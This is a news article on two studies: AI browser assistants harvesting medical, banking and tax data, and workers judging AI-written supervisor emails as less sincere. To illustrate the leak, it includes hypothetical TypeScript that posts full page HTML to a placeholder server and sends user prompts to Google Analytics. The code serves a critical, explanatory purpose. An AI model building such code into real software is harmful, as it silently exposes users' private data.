Artificial intelligence is now baked into web browsing and workplace communication. From AI-powered browsers that help with searches to chatbots drafting work emails, these tools promise efficiency. But a closer look reveals that many carry a privacy cost, and some create workplace trust problems. A pair of recent studies shows how these technologies collect sensitive information and affect professional credibility in surprising ways.
What’s Happening & Why This Matters
AI browsers record — a lot!
Researchers from the United Kingdom and Italy tested ten popular AI-powered browser assistants, including OpenAI’s ChatGPT, Microsoft’s Copilot, and Merlin AI for Chrome. They found that all but one, Perplexity AI, tracked sensitive data, including medical records, bank details, and even social security numbers.
The study revealed that some assistants, such as Merlin and Sider, didn’t stop tracking even in private spaces like health portals or online banking pages; in several cases, they transmitted the full webpage content to their servers. Merlin even captured users’ U.S. tax information.
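To make concrete what “transmitting the full webpage content” can look like, here is a minimal, hypothetical sketch of the pattern the researchers describe: a browser content script that reads the rendered page and posts it to a vendor server. The endpoint, field names, and helper function are illustrative assumptions, not code from any of the extensions studied.

```typescript
// Hypothetical sketch of full-page exfiltration by an assistant's content script.
// The endpoint and payload shape are assumptions for illustration only.
async function sendPageToAssistant(userPrompt: string): Promise<void> {
  const payload = {
    url: window.location.href,                 // may be a health portal or banking page
    html: document.documentElement.outerHTML,  // the full rendered page markup, sensitive content included
    prompt: userPrompt,                        // whatever the user typed to the assistant
  };
  // One POST request is all it takes to move the whole page off-device.
  await fetch("https://assistant.example.invalid/ingest", {
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify(payload),
  });
}
```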
Other extensions, such as Sider and TinaMind, passed user prompts and identifiable information, including IP addresses, to Google Analytics, enabling cross-site tracking and ad targeting. Meanwhile, assistants including ChatGPT, Copilot, and Sider inferred details such as a user’s age, gender, and income to personalise responses.
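For the analytics pathway, a plausible sketch is an assistant forwarding the user’s prompt, tagged with a persistent client ID, to Google Analytics 4’s Measurement Protocol. The measurement ID, API secret, and event shape below are placeholders; the point is that a prompt plus a stable identifier is enough raw material for cross-site profiling.

```typescript
// Hypothetical sketch of forwarding a prompt to Google Analytics 4's
// Measurement Protocol. measurement_id, api_secret, and the event name
// are placeholders, not values taken from any real extension.
async function forwardPromptToAnalytics(prompt: string, clientId: string): Promise<void> {
  const endpoint =
    "https://www.google-analytics.com/mp/collect" +
    "?measurement_id=G-XXXXXXXXXX&api_secret=API_SECRET_PLACEHOLDER";
  await fetch(endpoint, {
    method: "POST",
    body: JSON.stringify({
      client_id: clientId,                  // persistent ID that links activity across sites
      events: [
        {
          name: "assistant_prompt",
          params: { prompt_text: prompt },  // the user's own words, sent into an analytics pipeline
        },
      ],
    }),
  });
}
```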
According to Anna Maria Mandalari, senior author and assistant professor at University College London, these assistants “operate with unprecedented access to users’ online behaviour … often at the cost of user privacy.”
The researchers believe these practices may breach U.S. privacy laws on health data, such as HIPAA, and the EU’s GDPR rules governing personal data. Privacy policies confirm that many of these services collect user details, transaction history, and prompts for personalisation and legal compliance.
In the office, AI can hurt trust
A separate study, published in the International Journal of Business Communication, explored how AI-written work emails are perceived. Over 1,000 U.S. professionals were shown emails supposedly written by either themselves or their supervisors, with varying levels of AI assistance.
The results were telling. While people viewed their own AI-assisted writing favourably, they judged supervisors’ AI use more harshly. Only 40% of employees rated heavily AI-assisted supervisor emails as sincere, compared with 83% for emails with low AI assistance. The perception gap widened as AI assistance expanded from grammar checks to complete drafting.
Anthony Coman from the University of Florida, one of the study’s authors, noted that “AI-assisted writing can undermine perceptions of traits linked to a supervisor’s trustworthiness.” Employees were more forgiving when AI was used for purely informative messages. But for relationship-driven or motivational emails, heavy AI use reduced credibility.
The Grand Scheme of Things
Together, these findings show that AI’s integration into daily life is not risk-free. Browser assistants may compromise personal privacy, and workplace AI use can damage trust. Both issues require more transparency from tech providers and a nuanced understanding of when and how to deploy AI tools.
TF Summary: What’s Next
For users, awareness is the first defence. AI browsers and chatbots should be treated with the same caution as any service that collects personal data. Expect regulators to examine compliance with GDPR and U.S. privacy laws, especially as AI becomes embedded in everyday tasks. In the workplace, leaders should balance efficiency gains with the need to maintain trust. Limiting AI use in sensitive communications could help preserve credibility.